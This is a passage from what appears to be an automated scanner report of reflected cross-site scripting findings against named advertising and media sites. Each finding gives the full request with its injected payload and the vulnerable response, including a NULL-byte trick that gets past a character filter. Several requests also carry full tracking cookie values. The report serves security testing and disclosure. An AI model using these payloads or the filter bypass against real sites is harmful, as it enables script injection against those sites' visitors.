The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload d6819<a>1c7b7eb55e3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /tags/RubiconProjectAudienceExtensionMB/Segment4d6819<a>1c7b7eb55e3/tags.js/ HTTP/1.1
Host: tags.expo9.exponential.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 150
X-Reuse-Index: 1
Date: Fri, 28 Jan 2011 17:06:29 GMT
Last-Modified: Mon, 17 Jan 2011 07:16:23 GMT
Expires: Fri, 28 Jan 2011 18:06:29 GMT
Cache-Control: max-age=3600, private
Content-Type: application/x-javascript
Content-Encoding: none
Content-Length: 11815
Connection: Close

if (expo9_pageId == undefined) {
var expo9_pageId = (new Date()).getTime() % 20000001 + parseInt(Math.random() * 10000);
var expo9_adNum = 0;
}
var e9;
var e9TKey;
expo9_ad = (function() {

var version = "1.20";
var displayAdVersion = "0.3";

function expo9_ad() {
var t = this;
t.host = "a.tribalfusion.com";
t.site = "rubiconprojectaudienceextensionmb";
t.adSpace = "segment4d6819<a>1c7b7eb55e3";
t.tagKey = "1167608151";
t.tKey = e9TKey;
t.pageId = expo9_pageId;
t.center = 1;
t.flashVer = 0;
t.tagHash = makeTagHash();
t.displayAdURL = "http://"+t.host+"/displayAd.js?dver=" + di
...[SNIP]...

4.754. http://tags.expo9.exponential.com/tags/Zedo1AE/AudienceSelect/tags.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://tags.expo9.exponential.com
Path:	/tags/Zedo1AE/AudienceSelect/tags.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b2e7e<a>4be5b3a2cd7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /tags/Zedo1AEb2e7e<a>4be5b3a2cd7/AudienceSelect/tags.js HTTP/1.1
Host: tags.expo9.exponential.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=951
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 151
X-Reuse-Index: 1
Date: Sat, 29 Jan 2011 01:41:39 GMT
Last-Modified: Mon, 17 Jan 2011 07:16:23 GMT
Expires: Sat, 29 Jan 2011 02:41:39 GMT
Cache-Control: max-age=3600, private
Content-Type: application/x-javascript
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 11795

if (expo9_pageId == undefined) {
var expo9_pageId = (new Date()).getTime() % 20000001 + parseInt(Math.random() * 10000);
var expo9_adNum = 0;
}
var e9;
var e9TKey;
expo9_ad = (function() {

var version = "1.20";
var displayAdVersion = "0.3";

function expo9_ad() {
var t = this;
t.host = "a.tribalfusion.com";
t.site = "zedo1aeb2e7e<a>4be5b3a2cd7";
t.adSpace = "audienceselect";
t.tagKey = "1282868635";
t.tKey = e9TKey;
t.pageId = expo9_pageId;
t.center = 1;
t.flashVer = 0;
t.tagHash = makeTagHash();
t.displayAdURL = "http://"+t
...[SNIP]...

4.755. http://tags.expo9.exponential.com/tags/Zedo1AE/AudienceSelect/tags.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://tags.expo9.exponential.com
Path:	/tags/Zedo1AE/AudienceSelect/tags.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload eafa6<a>4caa897812 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /tags/Zedo1AE/AudienceSelecteafa6<a>4caa897812/tags.js HTTP/1.1
Host: tags.expo9.exponential.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=951
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 151
X-Reuse-Index: 1
Date: Sat, 29 Jan 2011 01:42:11 GMT
Last-Modified: Mon, 17 Jan 2011 07:16:23 GMT
Expires: Sat, 29 Jan 2011 02:42:11 GMT
Cache-Control: max-age=3600, private
Content-Type: application/x-javascript
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 11794

if (expo9_pageId == undefined) {
var expo9_pageId = (new Date()).getTime() % 20000001 + parseInt(Math.random() * 10000);
var expo9_adNum = 0;
}
var e9;
var e9TKey;
expo9_ad = (function() {

var version = "1.20";
var displayAdVersion = "0.3";

function expo9_ad() {
var t = this;
t.host = "a.tribalfusion.com";
t.site = "zedo1ae";
t.adSpace = "audienceselecteafa6<a>4caa897812";
t.tagKey = "1282868635";
t.tKey = e9TKey;
t.pageId = expo9_pageId;
t.center = 1;
t.flashVer = 0;
t.tagHash = makeTagHash();
t.displayAdURL = "http://"+t.host+"/displayAd.js?dver=" + di
...[SNIP]...

4.756. http://tap.rubiconproject.com/partner/agent/rubicon/channels.js [cb parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://tap.rubiconproject.com
Path:	/partner/agent/rubicon/channels.js

Issue detail

The value of the cb request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload %00af77a%3balert(1)//f494e559d40 was submitted in the cb parameter. This input was echoed as af77a;alert(1)//f494e559d40 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Request

GET /partner/agent/rubicon/channels.js?cb=oz_onPixelsLoaded%00af77a%3balert(1)//f494e559d40&pc=5804/7477 HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://assets.nydailynews.com/cssb1a8f'%3balert(1)//59512309c7e/20090601/nydn_homepage.css
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GIP9HWY4-MADS-10.208.38.239; put_1994=6ch47d7o8wtv; xdp_ti="26 Jan 2011 20:13:41 GMT"; put_1523=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ; khaos=GIPAEQ2D-C-IOYY; ruid=154d290e46adc1d6f373dd09^5^1296224069^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2025=38f8a1ac-1e96-40c8-8d5e-172234bf5f5f; put_1512=4d3702bc-839e-0690-5370-3c19a9561295; put_1430=e6f6dead-6db2-4b47-a015-f587315583eb; put_1902=CfTKz1vxnM4Qo87LXqXVyg71y5oQqc-aCvFBOBEd; put_2081=CA-00000000456885722; lm="28 Jan 2011 14:48:45 GMT"; put_2101=82d726c3-44ee-407c-85c4-39a0b0fc11ef; put_1185=3011330574290390485; put_1986=4760492999213801733; put_2132=D8DB51BF08484217F5D14AB47F4002AD; cd=false; dq=15|4|11|0; put_2100=usr3fd748acf5bcab14; ses15=7477^8; csi15=3178300.js^1^1296232904^1296232904&3168345.js^1^1296232903^1296232903&3174529.js^2^1296226115^1296226129&3187311.js^2^1296226114^1296226127&3173809.js^1^1296224076^1296224076&3178297.js^1^1296224073^1296224073; rpb=4894%3D1%264939%3D1%262399%3D1%263615%3D1%264940%3D1%262372%3D1%263169%3D1%262200%3D1%262374%3D1%265574%3D1%264210%3D1%265328%3D1%264554%3D1%265671%3D1%265852%3D1%264212%3D1%266286%3D1%266073%3D1%264214%3D1; put_1197=3297869551067506954; rdk=5804/7477; rdk2=0; ses2=7477^9; csi2=3174527.js^5^1296226121^1296232915&3138805.js^2^1296224077^1296226130&3178295.js^1^1296226112^1296226112

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 17:02:03 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/javascript;charset=UTF-8
Content-Length: 898
Cache-control: private
Set-Cookie: khaos=GIPAEQ2D-C-IOYY; Domain=.rubiconproject.com; Expires=Sat, 26-Jan-2019 17:02:03 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Connection: close

var oo_profile={
tokenType : "0",
tracking : "",
tags : "Beauty,Education,Family and Parenting,Hobbies and Interests,Arts and Entertainment",
tagcloud : [
{ tag: "Beauty", weight: 79}
...[SNIP]...
496,2202,2496,2203,2204,2189,2112,2497,2205,2355,2495,5838,3811,3512,2109,3812,2239,2190,2206,2113,2206,2113,4552,2765,6184,2240,4105,4193,2372,2373,2374,2375,"}
]
};

try {
oz_onPixelsLoaded.af77a;alert(1)//f494e559d40(oo_profile);
} catch(ignore) {}

4.757. http://tap.rubiconproject.com/partner/agent/rubicon/channels.js [cb parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://tap.rubiconproject.com
Path:	/partner/agent/rubicon/channels.js

Issue detail

The value of the cb request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload ae2f0%3balert(1)//6b60ca83c9 was submitted in the cb parameter. This input was echoed as ae2f0;alert(1)//6b60ca83c9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /partner/agent/rubicon/channels.js?cb=oz_onPixelsLoadedae2f0%3balert(1)//6b60ca83c9&pc=6272/9320 HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.cbs6albany.com/sections/thirdParty/iframe_header/?domain=events.cbs6albany.com&cname=zvents&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7Cevent&taxonomy=entertainment&trackstats=no
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GIP9HWY4-MADS-10.208.38.239; put_1994=6ch47d7o8wtv; xdp_ti="26 Jan 2011 20:13:41 GMT"; put_1523=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ; ruid=154d290e46adc1d6f373dd09^5^1296224069^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2025=38f8a1ac-1e96-40c8-8d5e-172234bf5f5f; put_1512=4d3702bc-839e-0690-5370-3c19a9561295; put_1430=e6f6dead-6db2-4b47-a015-f587315583eb; put_1902=CfTKz1vxnM4Qo87LXqXVyg71y5oQqc-aCvFBOBEd; put_2081=CA-00000000456885722; lm="28 Jan 2011 14:48:45 GMT"; put_2101=82d726c3-44ee-407c-85c4-39a0b0fc11ef; put_1185=3011330574290390485; put_1986=4760492999213801733; put_2132=D8DB51BF08484217F5D14AB47F4002AD; cd=false; dq=15|4|11|0; put_2100=usr3fd748acf5bcab14; put_1197=3297869551067506954; csi2=3174527.js^6^1296226121^1296232923&3138805.js^3^1296224077^1296232921&3178295.js^1^1296226112^1296226112; khaos=GIPAEQ2D-C-IOYY; rpb=4894%3D1%264939%3D1%262399%3D1%263615%3D1%264940%3D1%265574%3D1%264210%3D1%265328%3D1%264554%3D1%265671%3D1%265852%3D1%264212%3D1%266286%3D1%266073%3D1%264214%3D1%262372%3D1%262111%3D1%262494%3D1%262196%3D1%262189%3D1%263812%3D1%262374%3D1%263612%3D1; rdk2=0; ses2=7477^10&9320^2; rdk=6272/9320; rdk15=1; ses15=7477^10&9320^2; csi15=3182054.js^1^1296236268^1296236268&763123.js^1^1296236268^1296236268&618560.js^1^1296236263^1296236263&3174529.js^3^1296226115^1296232920&3168345.js^2^1296232903^1296232919&3178300.js^1^1296232904^1296232904&3187311.js^2^1296226114^1296226127&3173809.js^1^1296224076^1296224076&3178297.js^1^1296224073^1296224073

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:40:01 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/javascript;charset=UTF-8
Content-Length: 977
Cache-control: private
Set-Cookie: khaos=GIPAEQ2D-C-IOYY; Domain=.rubiconproject.com; Expires=Sun, 27-Jan-2019 01:40:01 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Connection: close

var oo_profile={
tokenType : "0",
tracking : "",
tags : "Education,Beauty,Dating and Relationships,Travel and Tourism High Affinity,Travel and Tourism,Swing Voters",
tagcloud : [
{ ta
...[SNIP]...
2496,2202,2496,2203,2204,2189,2112,2497,2205,2355,2495,5838,3811,3512,2109,3812,2239,2190,2206,2113,2206,2113,4552,2765,6184,2240,4105,4193,2372,2373,2374,2375,"}
]
};

try {
oz_onPixelsLoadedae2f0;alert(1)//6b60ca83c9(oo_profile);
} catch(ignore) {}

4.758. http://tr.imlive.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://tr.imlive.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2afd4'-alert(1)-'3181e4bce5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /?2afd4'-alert(1)-'3181e4bce5=1 HTTP/1.1
Host: tr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=a1eyxe45csoeo145imhg5vfy; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=a1eyxe45csoeo145imhg5vfy; path=/; HttpOnly
Set-Cookie: spvdr=vd=59ea87f5-6021-4c78-b7d1-1f922fc6dbd0&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:34 GMT; path=/
Set-Cookie: itr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:25:33 GMT
Connection: close
Content-Length: 19276
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="tr-TR" lang="tr-TR" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815996&ud=0&pe=/homepage.aspx&he=tr.imlive.com&ul=/?2afd4'-alert(1)-'3181e4bce5=1&qs=2afd4'-alert(1)-'3181e4bce5=1&qs=2afd4'-alert(1)-'3181e4bce5=1&iy=dallas&id=44&iu=1&vd=59ea87f5-6021-4c78-b7d1-1f922fc6dbd0';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEv
...[SNIP]...

4.759. http://tr.imlive.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://tr.imlive.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4282"><script>alert(1)</script>18266d653ee was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?d4282"><script>alert(1)</script>18266d653ee=1 HTTP/1.1
Host: tr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=5vcekb45xpt03o55sfewid55; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=5vcekb45xpt03o55sfewid55; path=/; HttpOnly
Set-Cookie: spvdr=vd=73be72ba-f032-4534-9729-f91765d9dbef&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:33 GMT; path=/
Set-Cookie: itr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:25:32 GMT
Connection: close
Content-Length: 19702
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="tr-TR" lang="tr-TR" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/uaccess/0/||d4282"><script>alert(1)</script>18266d653ee~1');return false;">
...[SNIP]...

4.760. http://voken.eyereturn.com/ [233369&click parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://voken.eyereturn.com
Path:	/

Issue detail

The value of the 233369&click request parameter is copied into the HTML document as plain text between tags. The payload c98d3<script>alert(1)</script>b11dcabd3ff was submitted in the 233369&click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /?233369&click=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000943794/cstr=758797=_4d43560a,8830366303,766159^943794^1183^0,1_/xsxdata=$xsxdata/bnum=758797/optn=64?trg=c98d3<script>alert(1)</script>b11dcabd3ff&params=8830366303 HTTP/1.1
Host: voken.eyereturn.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP NID PSAo PSDa OUR STP IND UNI COM NAV"
Set-Cookie: cmggl=1; Domain=.eyereturn.com; Expires=Mon, 28-Feb-2011 01:39:39 GMT; Path=/
Set-Cookie: er_guid=0253E4A4-2BB0-7708-5C00-B99AAC47FE39; Domain=.eyereturn.com; Expires=Mon, 28-Jan-2013 01:39:39 GMT; Path=/
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Sat, 29 Jan 2011 01:39:39 GMT
Connection: close
Server: eyeReturn Ad Serveri 6
Content-Length: 14948

//<!CDATA[// Copyright eyeReturn Marketing Inc., 2011, All Rights Reserved //
er_CID='7054';er_SegID='233370';er_imgSrc='http://resources.eyereturn.com/7054/007054_polite_300x250_f_30_v1.swf';er_toke
...[SNIP]...
3';er_wsID='1172';er_RedirURL='http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000943794/cstr=758797=_4d43560a,8830366303,766159^943794^1183^0,1_/xsxdata=$xsxdata/bnum=758797/optn=64?trg=c98d3<script>alert(1)</script>b11dcabd3ffhttp://ampyra.com/landing/infokit?&utm_campaign=FY10&utm_medium=banner&utm_source=aol&utm_content=ADCOM_MSS_B_DOCKIK_300x250_F';er_clickURL='http://r1-ads.ace.advertising.com/click/site=0000766159/mnum
...[SNIP]...

4.761. http://voken.eyereturn.com/pb/get [233369&click parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://voken.eyereturn.com
Path:	/pb/get

Issue detail

The value of the 233369&click request parameter is copied into the HTML document as plain text between tags. The payload 9f1ff<script>alert(1)</script>6eb75e1cdc4 was submitted in the 233369&click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pb/get?233369&click=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000943794/cstr=758797=_4d43560a,8830366303,766159^943794^1183^0,1_/xsxdata=$xsxdata/bnum=758797/optn=64?trg=9f1ff<script>alert(1)</script>6eb75e1cdc4&params=8830366303 HTTP/1.1
Host: voken.eyereturn.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmggl=1; er_guid=AB15549D-BD77-4F41-E5E1-E44D3AF016E4

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP NID PSAo PSDa OUR STP IND UNI COM NAV"
Set-Cookie: erTok="AwAAAADLogMAA7ggAAEAAByjAwADuCAAAQAA"; Domain=.eyereturn.com; Expires=Mon, 28-Jan-2013 01:39:47 GMT; Path=/
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Sat, 29 Jan 2011 01:39:47 GMT
Connection: close
Server: eyeReturn Ad Serveri 6
Content-Length: 14839

//<!CDATA[// Copyright eyeReturn Marketing Inc., 2011, All Rights Reserved //
er_CID='7054';er_SegID='233370';er_imgSrc='http://resources.eyereturn.com/7054/007054_polite_300x250_f_30_v1.swf';er_toke
...[SNIP]...
4';er_wsID='1172';er_RedirURL='http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000943794/cstr=758797=_4d43560a,8830366303,766159^943794^1183^0,1_/xsxdata=$xsxdata/bnum=758797/optn=64?trg=9f1ff<script>alert(1)</script>6eb75e1cdc4http://ampyra.com/landing/infokit?&utm_campaign=FY10&utm_medium=banner&utm_source=aol&utm_content=ADCOM_MSS_B_BBQIK_300x250_F';er_clickURL='http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=
...[SNIP]...

4.762. http://widgets.mobilelocalnews.com/ [uid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://widgets.mobilelocalnews.com
Path:	/

Issue detail

The value of the uid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95d17"><script>alert(1)</script>6e51300229e was submitted in the uid parameter. This input was echoed as 95d17\"><script>alert(1)</script>6e51300229e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?uid=42b39fdb198522d2bfc6b1f64cd9836595d17"><script>alert(1)</script>6e51300229e HTTP/1.1
Host: widgets.mobilelocalnews.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/srvc=home&position=4
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:39:50 GMT
Server: Apache
Content-Type: text/html
Content-Length: 8345

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> M
...[SNIP]...
<input type="hidden" id="userid" name="userid" value="42b39fdb198522d2bfc6b1f64cd9836595d17\"><script>alert(1)</script>6e51300229e">
...[SNIP]...

4.763. http://www.addthis.com/bookmark.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/bookmark.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload df18b<script>alert(1)</script>803ab7018bd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bookmark.phpdf18b<script>alert(1)</script>803ab7018bd HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sat, 29 Jan 2011 02:03:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=uqvune1puuutljd0ma17l7lng6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1473
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>bookmark.phpdf18b<script>alert(1)</script>803ab7018bd</strong>
...[SNIP]...

4.764. http://www.addthis.com/bookmark.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/bookmark.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 63e5f"-alert(1)-"65114331d2d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /bookmark.php63e5f"-alert(1)-"65114331d2d HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sat, 29 Jan 2011 02:03:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=1ndjvr1kahoqlol8igujp0dtv0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1447
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
